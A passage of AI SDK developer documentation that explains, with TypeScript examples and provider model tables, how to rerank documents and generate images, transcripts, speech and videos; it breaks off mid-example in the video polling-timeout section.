You can enhance embedding models, e.g. to set default values, using wrapEmbeddingModel and EmbeddingModelMiddleware.

Here is an example that uses the built-in defaultEmbeddingSettingsMiddleware:

import {
  defaultEmbeddingSettingsMiddleware,
  embed,
  wrapEmbeddingModel,
  gateway,
} from 'ai';

const embeddingModelWithDefaults = wrapEmbeddingModel({
  model: gateway.embeddingModel('google/gemini-embedding-001'),
  middleware: defaultEmbeddingSettingsMiddleware({
    settings: {
      providerOptions: {
        google: {
          outputDimensionality: 256,
          taskType: 'CLASSIFICATION',
        },
      },
    },
  }),
});

Embedding Providers & Models

Several providers offer embedding models:

Provider	Model	Embedding Dimensions
OpenAI	`text-embedding-3-large`	3072
OpenAI	`text-embedding-3-small`	1536
OpenAI	`text-embedding-ada-002`	1536
Google Generative AI	`gemini-embedding-001`	3072
Google Generative AI	`gemini-embedding-2-preview`	3072
Mistral	`mistral-embed`	1024
Cohere	`embed-english-v3.0`	1024
Cohere	`embed-multilingual-v3.0`	1024
Cohere	`embed-english-light-v3.0`	384
Cohere	`embed-multilingual-light-v3.0`	384
Cohere	`embed-english-v2.0`	4096
Cohere	`embed-english-light-v2.0`	1024
Cohere	`embed-multilingual-v2.0`	768
Amazon Bedrock	`amazon.titan-embed-text-v1`	1536
Amazon Bedrock	`amazon.titan-embed-text-v2:0`	1024

title: Reranking description: Learn how to rerank documents with the AI SDK.

Reranking

Reranking is a technique used to improve search relevance by reordering a set of documents based on their relevance to a query. Unlike embedding-based similarity search, reranking models are specifically trained to understand the relationship between queries and documents, often producing more accurate relevance scores.

Reranking Documents

The AI SDK provides the rerank function to rerank documents based on their relevance to a query. You can use it with reranking models, e.g. cohere.reranking('rerank-v3.5') or bedrock.reranking('cohere.rerank-v3-5:0').

import { rerank } from 'ai';
import { cohere } from '@ai-sdk/cohere';

const documents = [
  'sunny day at the beach',
  'rainy afternoon in the city',
  'snowy night in the mountains',
];

const { ranking } = await rerank({
  model: cohere.reranking('rerank-v3.5'),
  documents,
  query: 'talk about rain',
  topN: 2, // Return top 2 most relevant documents
});

console.log(ranking);
// [
//   { originalIndex: 1, score: 0.9, document: 'rainy afternoon in the city' },
//   { originalIndex: 0, score: 0.3, document: 'sunny day at the beach' }
// ]

Working with Object Documents

Reranking also supports structured documents (JSON objects), making it ideal for searching through databases, emails, or other structured content:

import { rerank } from 'ai';
import { cohere } from '@ai-sdk/cohere';

const documents = [
  {
    from: 'Paul Doe',
    subject: 'Follow-up',
    text: 'We are happy to give you a discount of 20% on your next order.',
  },
  {
    from: 'John McGill',
    subject: 'Missing Info',
    text: 'Sorry, but here is the pricing information from Oracle: $5000/month',
  },
];

const { ranking, rerankedDocuments } = await rerank({
  model: cohere.reranking('rerank-v3.5'),
  documents,
  query: 'Which pricing did we get from Oracle?',
  topN: 1,
});

console.log(rerankedDocuments[0]);
// { from: 'John McGill', subject: 'Missing Info', text: '...' }

Understanding the Results

The rerank function returns a comprehensive result object:

import { cohere } from '@ai-sdk/cohere';
import { rerank } from 'ai';

const { ranking, rerankedDocuments, originalDocuments } = await rerank({
  model: cohere.reranking('rerank-v3.5'),
  documents: ['sunny day at the beach', 'rainy afternoon in the city'],
  query: 'talk about rain',
});

// ranking: sorted array of { originalIndex, score, document }
// rerankedDocuments: documents sorted by relevance (convenience property)
// originalDocuments: original documents array

Each item in the ranking array contains:

originalIndex: Position in the original documents array
score: Relevance score (typically 0-1, where higher is more relevant)
document: The original document

Settings

Top-N Results

Use topN to limit the number of results returned. This is useful for retrieving only the most relevant documents:

import { cohere } from '@ai-sdk/cohere';
import { rerank } from 'ai';

const { ranking } = await rerank({
  model: cohere.reranking('rerank-v3.5'),
  documents: ['doc1', 'doc2', 'doc3', 'doc4', 'doc5'],
  query: 'relevant information',
  topN: 3, // Return only top 3 most relevant documents
});

Provider Options

Reranking model settings can be configured using providerOptions for provider-specific parameters:

import { cohere } from '@ai-sdk/cohere';
import { rerank } from 'ai';

const { ranking } = await rerank({
  model: cohere.reranking('rerank-v3.5'),
  documents: ['sunny day at the beach', 'rainy afternoon in the city'],
  query: 'talk about rain',
  providerOptions: {
    cohere: {
      maxTokensPerDoc: 1000, // Limit tokens per document
    },
  },
});

Retries

The rerank function accepts an optional maxRetries parameter of type number that you can use to set the maximum number of retries for the reranking process. It defaults to 2 retries (3 attempts in total). You can set it to 0 to disable retries.

import { cohere } from '@ai-sdk/cohere';
import { rerank } from 'ai';

const { ranking } = await rerank({
  model: cohere.reranking('rerank-v3.5'),
  documents: ['sunny day at the beach', 'rainy afternoon in the city'],
  query: 'talk about rain',
  maxRetries: 0, // Disable retries
});

Abort Signals and Timeouts

The rerank function accepts an optional abortSignal parameter of type AbortSignal that you can use to abort the reranking process or set a timeout.

import { cohere } from '@ai-sdk/cohere';
import { rerank } from 'ai';

const { ranking } = await rerank({
  model: cohere.reranking('rerank-v3.5'),
  documents: ['sunny day at the beach', 'rainy afternoon in the city'],
  query: 'talk about rain',
  abortSignal: AbortSignal.timeout(5000), // Abort after 5 seconds
});

Custom Headers

The rerank function accepts an optional headers parameter of type Record<string, string> that you can use to add custom headers to the reranking request.

import { cohere } from '@ai-sdk/cohere';
import { rerank } from 'ai';

const { ranking } = await rerank({
  model: cohere.reranking('rerank-v3.5'),
  documents: ['sunny day at the beach', 'rainy afternoon in the city'],
  query: 'talk about rain',
  headers: { 'X-Custom-Header': 'custom-value' },
});

Response Information

The rerank function returns response information that includes the raw provider response:

import { cohere } from '@ai-sdk/cohere';
import { rerank } from 'ai';

const { ranking, response } = await rerank({
  model: cohere.reranking('rerank-v3.5'),
  documents: ['sunny day at the beach', 'rainy afternoon in the city'],
  query: 'talk about rain',
});

console.log(response); // { id, timestamp, modelId, headers, body }

Reranking Providers & Models

Several providers offer reranking models:

Provider	Model
Cohere	`rerank-v3.5`
Cohere	`rerank-english-v3.0`
Cohere	`rerank-multilingual-v3.0`
Amazon Bedrock	`amazon.rerank-v1:0`
Amazon Bedrock	`cohere.rerank-v3-5:0`
Together.ai	`Salesforce/Llama-Rank-v1`
Together.ai	`mixedbread-ai/Mxbai-Rerank-Large-V2`

title: Image Generation description: Learn how to generate images with the AI SDK.

Image Generation

The AI SDK provides the generateImage function to generate images based on a given prompt using an image model.

import { generateImage } from 'ai';
__PROVIDER_IMPORT__;

const { image } = await generateImage({
  model: __IMAGE_MODEL__,
  prompt: 'Santa Claus driving a Cadillac',
});

You can access the image data using the base64 or uint8Array properties:

const base64 = image.base64; // base64 image data
const uint8Array = image.uint8Array; // Uint8Array image data

Settings

Size and Aspect Ratio

Depending on the model, you can either specify the size or the aspect ratio.

Size

The size is specified as a string in the format {width}x{height}. Models only support a few sizes, and the supported sizes are different for each model and provider.

import { generateImage } from 'ai';
__PROVIDER_IMPORT__;

const { image } = await generateImage({
  model: __IMAGE_MODEL__,
  prompt: 'Santa Claus driving a Cadillac',
  size: '1024x1024',
});

Aspect Ratio

The aspect ratio is specified as a string in the format {width}:{height}. Models only support a few aspect ratios, and the supported aspect ratios are different for each model and provider.

import { generateImage } from 'ai';
__PROVIDER_IMPORT__;

const { image } = await generateImage({
  model: __IMAGE_MODEL__,
  prompt: 'Santa Claus driving a Cadillac',
  aspectRatio: '16:9',
});

Generating Multiple Images

generateImage also supports generating multiple images at once:

import { generateImage } from 'ai';
__PROVIDER_IMPORT__;

const { images } = await generateImage({
  model: __IMAGE_MODEL__,
  prompt: 'Santa Claus driving a Cadillac',
  n: 4, // number of images to generate
});

const { images } = await generateImage({
  model: __IMAGE_MODEL__,
  prompt: 'Santa Claus driving a Cadillac',
  maxImagesPerCall: 5, // Override the default batch size
  n: 10, // Will make 2 calls of 5 images each
});

Providing a Seed

You can provide a seed to the generateImage function to control the output of the image generation process. If supported by the model, the same seed will always produce the same image.

import { generateImage } from 'ai';
__PROVIDER_IMPORT__;

const { image } = await generateImage({
  model: __IMAGE_MODEL__,
  prompt: 'Santa Claus driving a Cadillac',
  seed: 1234567890,
});

Provider-specific Settings

import { generateImage } from 'ai';
import { openai } from '@ai-sdk/openai';

const { image } = await generateImage({
  model: openai.image('dall-e-3'),
  prompt: 'Santa Claus driving a Cadillac',
  size: '1024x1024',
  providerOptions: {
    openai: { style: 'vivid', quality: 'hd' },
  },
});

Abort Signals and Timeouts

generateImage accepts an optional abortSignal parameter of type AbortSignal that you can use to abort the image generation process or set a timeout.

import { generateImage } from 'ai';
__PROVIDER_IMPORT__;

const { image } = await generateImage({
  model: __IMAGE_MODEL__,
  prompt: 'Santa Claus driving a Cadillac',
  abortSignal: AbortSignal.timeout(1000), // Abort after 1 second
});

Custom Headers

generateImage accepts an optional headers parameter of type Record<string, string> that you can use to add custom headers to the image generation request.

import { generateImage } from 'ai';
__PROVIDER_IMPORT__;

const { image } = await generateImage({
  model: __IMAGE_MODEL__,
  prompt: 'Santa Claus driving a Cadillac',
  headers: { 'X-Custom-Header': 'custom-value' },
});

Warnings

If the model returns warnings, e.g. for unsupported parameters, they will be available in the warnings property of the response.

const { image, warnings } = await generateImage({
  model: __IMAGE_MODEL__,
  prompt: 'Santa Claus driving a Cadillac',
});

Additional provider-specific meta data

Some providers expose additional meta data for the result overall or per image.

const prompt = 'Santa Claus driving a Cadillac';

const { image, providerMetadata } = await generateImage({
  model: openai.image('dall-e-3'),
  prompt,
});

const revisedPrompt = providerMetadata.openai.images[0]?.revisedPrompt;

console.log({
  prompt,
  revisedPrompt,
});

Error Handling

When generateImage cannot generate a valid image, it throws a AI_NoImageGeneratedError.

This error occurs when the AI provider fails to generate an image. It can arise due to the following reasons:

The model failed to generate a response
The model generated a response that could not be parsed

The error preserves the following information to help you log the issue:

responses: Metadata about the image model responses, including timestamp, model, and headers.
cause: The cause of the error. You can use this for more detailed error handling

import { generateImage, NoImageGeneratedError } from 'ai';

try {
  await generateImage({ model, prompt });
} catch (error) {
  if (NoImageGeneratedError.isInstance(error)) {
    console.log('NoImageGeneratedError');
    console.log('Cause:', error.cause);
    console.log('Responses:', error.responses);
  }
}

Image Middleware

You can enhance image models, e.g. to set default values or implement logging, using wrapImageModel and ImageModelV3Middleware.

Here is an example that sets a default size when none is provided:

import { generateImage, wrapImageModel } from 'ai';
__PROVIDER_IMPORT__;

const model = wrapImageModel({
  model: __IMAGE_MODEL__,
  middleware: {
    specificationVersion: 'v3',
    transformParams: async ({ params }) => ({
      ...params,
      size: params.size ?? '1024x1024',
    }),
  },
});

const { image } = await generateImage({
  model,
  prompt: 'Santa Claus driving a Cadillac',
});

Generating Images with Language Models

Some language models such as Google gemini-2.5-flash-image support multi-modal outputs including images. With such models, you can access the generated images using the files property of the response.

import { google } from '@ai-sdk/google';
import { generateText } from 'ai';

const result = await generateText({
  model: google('gemini-2.5-flash-image'),
  prompt: 'Generate an image of a comic cat',
});

for (const file of result.files) {
  if (file.mediaType.startsWith('image/')) {
    // The file object provides multiple data formats:
    // Access images as base64 string, Uint8Array binary data, or check type
    // - file.base64: string (data URL format)
    // - file.uint8Array: Uint8Array (binary data)
    // - file.mediaType: string (e.g. "image/png")
  }
}

Image Models

Provider	Model	Support sizes (`width x height`) or aspect ratios (`width : height`)
xAI Grok	`grok-imagine-image`	`1:1`, `16:9`, `9:16`, `4:3`, `3:4`, `3:2`, `2:3`, `2:1`, `1:2`, `19.5:9`, `9:19.5`, `20:9`, `9:20`, `auto`
OpenAI	`gpt-image-1`	1024x1024, 1536x1024, 1024x1536
OpenAI	`dall-e-3`	1024x1024, 1792x1024, 1024x1792
OpenAI	`dall-e-2`	256x256, 512x512, 1024x1024
Amazon Bedrock	`amazon.nova-canvas-v1:0`	320-4096 (multiples of 16), 1:4 to 4:1, max 4.2M pixels
Fal	`fal-ai/flux/dev`	1:1, 3:4, 4:3, 9:16, 16:9, 9:21, 21:9
Fal	`fal-ai/flux-lora`	1:1, 3:4, 4:3, 9:16, 16:9, 9:21, 21:9
Fal	`fal-ai/fast-sdxl`	1:1, 3:4, 4:3, 9:16, 16:9, 9:21, 21:9
Fal	`fal-ai/flux-pro/v1.1-ultra`	1:1, 3:4, 4:3, 9:16, 16:9, 9:21, 21:9
Fal	`fal-ai/ideogram/v2`	1:1, 3:4, 4:3, 9:16, 16:9, 9:21, 21:9
Fal	`fal-ai/recraft-v3`	1:1, 3:4, 4:3, 9:16, 16:9, 9:21, 21:9
Fal	`fal-ai/stable-diffusion-3.5-large`	1:1, 3:4, 4:3, 9:16, 16:9, 9:21, 21:9
Fal	`fal-ai/hyper-sdxl`	1:1, 3:4, 4:3, 9:16, 16:9, 9:21, 21:9
DeepInfra	`stabilityai/sd3.5`	1:1, 16:9, 1:9, 3:2, 2:3, 4:5, 5:4, 9:16, 9:21
DeepInfra	`black-forest-labs/FLUX-1.1-pro`	256-1440 (multiples of 32)
DeepInfra	`black-forest-labs/FLUX-1-schnell`	256-1440 (multiples of 32)
DeepInfra	`black-forest-labs/FLUX-1-dev`	256-1440 (multiples of 32)
DeepInfra	`black-forest-labs/FLUX-pro`	256-1440 (multiples of 32)
DeepInfra	`stabilityai/sd3.5-medium`	1:1, 16:9, 1:9, 3:2, 2:3, 4:5, 5:4, 9:16, 9:21
DeepInfra	`stabilityai/sdxl-turbo`	1:1, 16:9, 1:9, 3:2, 2:3, 4:5, 5:4, 9:16, 9:21
Replicate	`black-forest-labs/flux-schnell`	1:1, 2:3, 3:2, 4:5, 5:4, 16:9, 9:16, 9:21, 21:9
Replicate	`recraft-ai/recraft-v3`	1024x1024, 1365x1024, 1024x1365, 1536x1024, 1024x1536, 1820x1024, 1024x1820, 1024x2048, 2048x1024, 1434x1024, 1024x1434, 1024x1280, 1280x1024, 1024x1707, 1707x1024
Google	`imagen-4.0-generate-001`	1:1, 3:4, 4:3, 9:16, 16:9
Google	`imagen-4.0-fast-generate-001`	1:1, 3:4, 4:3, 9:16, 16:9
Google	`imagen-4.0-ultra-generate-001`	1:1, 3:4, 4:3, 9:16, 16:9
Google Vertex	`imagen-4.0-generate-001`	1:1, 3:4, 4:3, 9:16, 16:9
Google Vertex	`imagen-4.0-fast-generate-001`	1:1, 3:4, 4:3, 9:16, 16:9
Google Vertex	`imagen-4.0-ultra-generate-001`	1:1, 3:4, 4:3, 9:16, 16:9
Google Vertex	`imagen-3.0-fast-generate-001`	1:1, 3:4, 4:3, 9:16, 16:9
Fireworks	`accounts/fireworks/models/flux-1-dev-fp8`	1:1, 2:3, 3:2, 4:5, 5:4, 16:9, 9:16, 9:21, 21:9
Fireworks	`accounts/fireworks/models/flux-1-schnell-fp8`	1:1, 2:3, 3:2, 4:5, 5:4, 16:9, 9:16, 9:21, 21:9
Fireworks	`accounts/fireworks/models/playground-v2-5-1024px-aesthetic`	640x1536, 768x1344, 832x1216, 896x1152, 1024x1024, 1152x896, 1216x832, 1344x768, 1536x640
Fireworks	`accounts/fireworks/models/japanese-stable-diffusion-xl`	640x1536, 768x1344, 832x1216, 896x1152, 1024x1024, 1152x896, 1216x832, 1344x768, 1536x640
Fireworks	`accounts/fireworks/models/playground-v2-1024px-aesthetic`	640x1536, 768x1344, 832x1216, 896x1152, 1024x1024, 1152x896, 1216x832, 1344x768, 1536x640
Fireworks	`accounts/fireworks/models/SSD-1B`	640x1536, 768x1344, 832x1216, 896x1152, 1024x1024, 1152x896, 1216x832, 1344x768, 1536x640
Fireworks	`accounts/fireworks/models/stable-diffusion-xl-1024-v1-0`	640x1536, 768x1344, 832x1216, 896x1152, 1024x1024, 1152x896, 1216x832, 1344x768, 1536x640
Luma	`photon-1`	1:1, 3:4, 4:3, 9:16, 16:9, 9:21, 21:9
Luma	`photon-flash-1`	1:1, 3:4, 4:3, 9:16, 16:9, 9:21, 21:9
Together.ai	`stabilityai/stable-diffusion-xl-base-1.0`	512x512, 768x768, 1024x1024
Together.ai	`black-forest-labs/FLUX.1-dev`	512x512, 768x768, 1024x1024
Together.ai	`black-forest-labs/FLUX.1-dev-lora`	512x512, 768x768, 1024x1024
Together.ai	`black-forest-labs/FLUX.1-schnell`	512x512, 768x768, 1024x1024
Together.ai	`black-forest-labs/FLUX.1-canny`	512x512, 768x768, 1024x1024
Together.ai	`black-forest-labs/FLUX.1-depth`	512x512, 768x768, 1024x1024
Together.ai	`black-forest-labs/FLUX.1-redux`	512x512, 768x768, 1024x1024
Together.ai	`black-forest-labs/FLUX.1.1-pro`	512x512, 768x768, 1024x1024
Together.ai	`black-forest-labs/FLUX.1-pro`	512x512, 768x768, 1024x1024
Together.ai	`black-forest-labs/FLUX.1-schnell-Free`	512x512, 768x768, 1024x1024
Black Forest Labs	`flux-kontext-pro`	From 3:7 (portrait) to 7:3 (landscape)
Black Forest Labs	`flux-kontext-max`	From 3:7 (portrait) to 7:3 (landscape)
Black Forest Labs	`flux-pro-1.1-ultra`	From 3:7 (portrait) to 7:3 (landscape)
Black Forest Labs	`flux-pro-1.1`	From 3:7 (portrait) to 7:3 (landscape)
Black Forest Labs	`flux-pro-1.0-fill`	From 3:7 (portrait) to 7:3 (landscape)

Above are a small subset of the image models supported by the AI SDK providers. For more, see the respective provider documentation.

title: Transcription description: Learn how to transcribe audio with the AI SDK.

Transcription

Transcription is an experimental feature.

The AI SDK provides the transcribe function to transcribe audio using a transcription model.

import { experimental_transcribe as transcribe } from 'ai';
import { openai } from '@ai-sdk/openai';
import { readFile } from 'fs/promises';

const transcript = await transcribe({
  model: openai.transcription('whisper-1'),
  audio: await readFile('audio.mp3'),
});

The audio property can be a Uint8Array, ArrayBuffer, Buffer, string (base64 encoded audio data), or a URL.

To access the generated transcript:

const text = transcript.text; // transcript text e.g. "Hello, world!"
const segments = transcript.segments; // array of segments with start and end times, if available
const language = transcript.language; // language of the transcript e.g. "en", if available
const durationInSeconds = transcript.durationInSeconds; // duration of the transcript in seconds, if available

Settings

Provider-Specific settings

Transcription models often have provider or model-specific settings which you can set using the providerOptions parameter.

import { experimental_transcribe as transcribe } from 'ai';
import { openai } from '@ai-sdk/openai';
import { readFile } from 'fs/promises';

const transcript = await transcribe({
  model: openai.transcription('whisper-1'),
  audio: await readFile('audio.mp3'),
  providerOptions: {
    openai: {
      timestampGranularities: ['word'],
    },
  },
});

Download Size Limits

When audio is a URL, the SDK downloads the file with a default 2 GiB size limit. You can customize this using createDownload:

import { experimental_transcribe as transcribe, createDownload } from 'ai';
import { openai } from '@ai-sdk/openai';

const transcript = await transcribe({
  model: openai.transcription('whisper-1'),
  audio: new URL('https://example.com/audio.mp3'),
  download: createDownload({ maxBytes: 50 * 1024 * 1024 }), // 50 MB limit
});

You can also provide a fully custom download function:

import { experimental_transcribe as transcribe } from 'ai';
import { openai } from '@ai-sdk/openai';

const transcript = await transcribe({
  model: openai.transcription('whisper-1'),
  audio: new URL('https://example.com/audio.mp3'),
  download: async ({ url }) => {
    const res = await myAuthenticatedFetch(url);
    return {
      data: new Uint8Array(await res.arrayBuffer()),
      mediaType: res.headers.get('content-type') ?? undefined,
    };
  },
});

If a download exceeds the size limit, a DownloadError is thrown:

import { experimental_transcribe as transcribe, DownloadError } from 'ai';
import { openai } from '@ai-sdk/openai';

try {
  await transcribe({
    model: openai.transcription('whisper-1'),
    audio: new URL('https://example.com/audio.mp3'),
  });
} catch (error) {
  if (DownloadError.isInstance(error)) {
    console.log('Download failed:', error.message);
  }
}

Abort Signals and Timeouts

transcribe accepts an optional abortSignal parameter of type AbortSignal that you can use to abort the transcription process or set a timeout.

This is particularly useful when combined with URL downloads to prevent long-running requests:

import { openai } from '@ai-sdk/openai';
import { experimental_transcribe as transcribe } from 'ai';

const transcript = await transcribe({
  model: openai.transcription('whisper-1'),
  audio: new URL('https://example.com/audio.mp3'),
  abortSignal: AbortSignal.timeout(5000), // Abort after 5 seconds
});

Custom Headers

transcribe accepts an optional headers parameter of type Record<string, string> that you can use to add custom headers to the transcription request.

import { openai } from '@ai-sdk/openai';
import { experimental_transcribe as transcribe } from 'ai';
import { readFile } from 'fs/promises';

const transcript = await transcribe({
  model: openai.transcription('whisper-1'),
  audio: await readFile('audio.mp3'),
  headers: { 'X-Custom-Header': 'custom-value' },
});

Warnings

Warnings (e.g. unsupported parameters) are available on the warnings property.

import { openai } from '@ai-sdk/openai';
import { experimental_transcribe as transcribe } from 'ai';
import { readFile } from 'fs/promises';

const transcript = await transcribe({
  model: openai.transcription('whisper-1'),
  audio: await readFile('audio.mp3'),
});

const warnings = transcript.warnings;

Error Handling

When transcribe cannot generate a valid transcript, it throws a AI_NoTranscriptGeneratedError.

This error can arise for any of the following reasons:

The model failed to generate a response
The model generated a response that could not be parsed

The error preserves the following information to help you log the issue:

responses: Metadata about the transcription model responses, including timestamp, model, and headers.
cause: The cause of the error. You can use this for more detailed error handling.

import {
  experimental_transcribe as transcribe,
  NoTranscriptGeneratedError,
} from 'ai';
import { openai } from '@ai-sdk/openai';
import { readFile } from 'fs/promises';

try {
  await transcribe({
    model: openai.transcription('whisper-1'),
    audio: await readFile('audio.mp3'),
  });
} catch (error) {
  if (NoTranscriptGeneratedError.isInstance(error)) {
    console.log('NoTranscriptGeneratedError');
    console.log('Cause:', error.cause);
    console.log('Responses:', error.responses);
  }
}

Transcription Models

Provider	Model
OpenAI	`whisper-1`
OpenAI	`gpt-4o-transcribe`
OpenAI	`gpt-4o-mini-transcribe`
ElevenLabs	`scribe_v1`
ElevenLabs	`scribe_v1_experimental`
Groq	`whisper-large-v3-turbo`
Groq	`whisper-large-v3`
Azure OpenAI	`whisper-1`
Azure OpenAI	`gpt-4o-transcribe`
Azure OpenAI	`gpt-4o-mini-transcribe`
Rev.ai	`machine`
Rev.ai	`low_cost`
Rev.ai	`fusion`
Deepgram	`base` (+ variants)
Deepgram	`enhanced` (+ variants)
Deepgram	`nova` (+ variants)
Deepgram	`nova-2` (+ variants)
Deepgram	`nova-3` (+ variants)
Gladia	`default`
AssemblyAI	`best`
AssemblyAI	`nano`
Fal	`whisper`
Fal	`wizper`

Above are a small subset of the transcription models supported by the AI SDK providers. For more, see the respective provider documentation.

title: Speech description: Learn how to generate speech from text with the AI SDK.

Speech

Speech is an experimental feature.

The AI SDK provides the generateSpeech function to generate speech from text using a speech model.

import { experimental_generateSpeech as generateSpeech } from 'ai';
import { openai } from '@ai-sdk/openai';

const audio = await generateSpeech({
  model: openai.speech('tts-1'),
  text: 'Hello, world!',
  voice: 'alloy',
});

Language Setting

You can specify the language for speech generation (provider support varies):

import { experimental_generateSpeech as generateSpeech } from 'ai';
import { lmnt } from '@ai-sdk/lmnt';

const audio = await generateSpeech({
  model: lmnt.speech('aurora'),
  text: 'Hola, mundo!',
  language: 'es', // Spanish
});

To access the generated audio:

const audioData = result.audio.uint8Array; // audio data as Uint8Array
// or
const audioBase64 = result.audio.base64; // audio data as base64 string

Settings

Provider-Specific settings

You can set model-specific settings with the providerOptions parameter.

import { experimental_generateSpeech as generateSpeech } from 'ai';
import { openai } from '@ai-sdk/openai';

const audio = await generateSpeech({
  model: openai.speech('tts-1'),
  text: 'Hello, world!',
  providerOptions: {
    openai: {
      // ...
    },
  },
});

Abort Signals and Timeouts

generateSpeech accepts an optional abortSignal parameter of type AbortSignal that you can use to abort the speech generation process or set a timeout.

import { openai } from '@ai-sdk/openai';
import { experimental_generateSpeech as generateSpeech } from 'ai';

const audio = await generateSpeech({
  model: openai.speech('tts-1'),
  text: 'Hello, world!',
  abortSignal: AbortSignal.timeout(1000), // Abort after 1 second
});

Custom Headers

generateSpeech accepts an optional headers parameter of type Record<string, string> that you can use to add custom headers to the speech generation request.

import { openai } from '@ai-sdk/openai';
import { experimental_generateSpeech as generateSpeech } from 'ai';

const audio = await generateSpeech({
  model: openai.speech('tts-1'),
  text: 'Hello, world!',
  headers: { 'X-Custom-Header': 'custom-value' },
});

Warnings

Warnings (e.g. unsupported parameters) are available on the warnings property.

import { openai } from '@ai-sdk/openai';
import { experimental_generateSpeech as generateSpeech } from 'ai';

const audio = await generateSpeech({
  model: openai.speech('tts-1'),
  text: 'Hello, world!',
});

const warnings = audio.warnings;

Error Handling

When generateSpeech cannot generate a valid audio, it throws a AI_NoSpeechGeneratedError.

This error can arise for any of the following reasons:

The model failed to generate a response
The model generated a response that could not be parsed

The error preserves the following information to help you log the issue:

responses: Metadata about the speech model responses, including timestamp, model, and headers.
cause: The cause of the error. You can use this for more detailed error handling.

import {
  experimental_generateSpeech as generateSpeech,
  NoSpeechGeneratedError,
} from 'ai';
import { openai } from '@ai-sdk/openai';

try {
  await generateSpeech({
    model: openai.speech('tts-1'),
    text: 'Hello, world!',
  });
} catch (error) {
  if (NoSpeechGeneratedError.isInstance(error)) {
    console.log('AI_NoSpeechGeneratedError');
    console.log('Cause:', error.cause);
    console.log('Responses:', error.responses);
  }
}

Speech Models

Provider	Model
OpenAI	`tts-1`
OpenAI	`tts-1-hd`
OpenAI	`gpt-4o-mini-tts`
ElevenLabs	`eleven_v3`
ElevenLabs	`eleven_multilingual_v2`
ElevenLabs	`eleven_flash_v2_5`
ElevenLabs	`eleven_flash_v2`
ElevenLabs	`eleven_turbo_v2_5`
ElevenLabs	`eleven_turbo_v2`
LMNT	`aurora`
LMNT	`blizzard`
Hume	`default`

Above are a small subset of the speech models supported by the AI SDK providers. For more, see the respective provider documentation.

title: Video Generation description: Learn how to generate videos with the AI SDK.

Video Generation

The AI SDK provides the experimental_generateVideo function to generate videos based on a given prompt using a video model.

import { experimental_generateVideo as generateVideo } from 'ai';
__PROVIDER_IMPORT__;

const { video } = await generateVideo({
  model: __VIDEO_MODEL__,
  prompt: 'A cat walking on a treadmill',
});

You can access the video data using the base64 or uint8Array properties:

const base64 = video.base64; // base64 video data
const uint8Array = video.uint8Array; // Uint8Array video data

Settings

Aspect Ratio

The aspect ratio is specified as a string in the format {width}:{height}. Models only support a few aspect ratios, and the supported aspect ratios are different for each model and provider.

import { experimental_generateVideo as generateVideo } from 'ai';
__PROVIDER_IMPORT__;

const { video } = await generateVideo({
  model: __VIDEO_MODEL__,
  prompt: 'A cat walking on a treadmill',
  aspectRatio: '16:9',
});

Resolution

The resolution is specified as a string in the format {width}x{height}. Models only support specific resolutions, and the supported resolutions are different for each model and provider.

import { experimental_generateVideo as generateVideo } from 'ai';
__PROVIDER_IMPORT__;

const { video } = await generateVideo({
  model: __VIDEO_MODEL__,
  prompt: 'A serene mountain landscape at sunset',
  resolution: '1280x720',
});

Duration

Some video models support specifying the duration of the generated video in seconds.

import { experimental_generateVideo as generateVideo } from 'ai';
__PROVIDER_IMPORT__;

const { video } = await generateVideo({
  model: __VIDEO_MODEL__,
  prompt: 'A timelapse of clouds moving across the sky',
  duration: 5,
});

Frames Per Second (FPS)

Some video models allow you to specify the frames per second for the generated video.

import { experimental_generateVideo as generateVideo } from 'ai';
__PROVIDER_IMPORT__;

const { video } = await generateVideo({
  model: __VIDEO_MODEL__,
  prompt: 'A hummingbird in slow motion',
  fps: 24,
});

Generating Multiple Videos

experimental_generateVideo supports generating multiple videos at once:

import { experimental_generateVideo as generateVideo } from 'ai';
__PROVIDER_IMPORT__;

const { videos } = await generateVideo({
  model: __VIDEO_MODEL__,
  prompt: 'A rocket launching into space',
  n: 3, // number of videos to generate
});

Each video model has an internal limit on how many videos it can generate in a single API call. The AI SDK manages this automatically by batching requests appropriately when you request multiple videos using the n parameter. Most video models only support generating 1 video per call due to computational cost.

If needed, you can override this behavior using the maxVideosPerCall setting:

const { videos } = await generateVideo({
  model: __VIDEO_MODEL__,
  prompt: 'A rocket launching into space',
  maxVideosPerCall: 2, // Override the default batch size
  n: 4, // Will make 2 calls of 2 videos each
});

Image-to-Video Generation

Some video models support generating videos from an input image. You can provide an image using the prompt object:

import { experimental_generateVideo as generateVideo } from 'ai';
__PROVIDER_IMPORT__;

const { video } = await generateVideo({
  model: __VIDEO_MODEL__,
  prompt: {
    image: 'https://example.com/my-image.png',
    text: 'Animate this image with gentle motion',
  },
});

You can also provide the image as a base64-encoded string or Uint8Array:

const { video } = await generateVideo({
  model: __VIDEO_MODEL__,
  prompt: {
    image: imageBase64String, // or imageUint8Array
    text: 'Animate this image',
  },
});

Providing a Seed

You can provide a seed to the experimental_generateVideo function to control the output of the video generation process. If supported by the model, the same seed will always produce the same video.

import { experimental_generateVideo as generateVideo } from 'ai';
__PROVIDER_IMPORT__;

const { video } = await generateVideo({
  model: __VIDEO_MODEL__,
  prompt: 'A cat walking on a treadmill',
  seed: 1234567890,
});

Provider-specific Settings

Video models often have provider- or even model-specific settings. You can pass such settings to the experimental_generateVideo function using the providerOptions parameter. The options for the provider become request body properties.

import { experimental_generateVideo as generateVideo } from 'ai';
import { fal } from '@ai-sdk/fal';

const { video } = await generateVideo({
  model: fal.video('luma-dream-machine/ray-2'),
  prompt: 'A cat walking on a treadmill',
  aspectRatio: '16:9',
  providerOptions: {
    fal: { loop: true, motionStrength: 0.8 },
  },
});

Abort Signals and Timeouts

experimental_generateVideo accepts an optional abortSignal parameter of type AbortSignal that you can use to abort the video generation process or set a timeout.

import { experimental_generateVideo as generateVideo } from 'ai';
__PROVIDER_IMPORT__;

const { video } = await generateVideo({
  model: __VIDEO_MODEL__,
  prompt: 'A cat walking on a treadmill',
  abortSignal: AbortSignal.timeout(60000), // Abort after 60 seconds
});

Polling Timeout

Video generation is an asynchronous process that can take several minutes to complete. Most providers use a polling mechanism where the SDK periodically checks if the video is ready. The default polling timeout is typically 5 minutes, which may not be sufficient for longer videos or certain models.

You can configure the polling timeout using provider-specific options. Each provider exports a type for its options that you can use with satisfies for type safety:

import { experimental_generateVideo as generateVideo } from 'ai';
import { fal, type FalVideoModelOptions } from '@ai-sdk/fal';

const { video } = await generateVideo({
  model: fal.video('luma-dream-machine/ray-2'),
  prompt: 'A cinematic timelapse of a city from dawn to dusk',
  duration: 10,
  providerOptions: {
    fal: {
      pollTimeoutMs: 600000, // 10 minutes
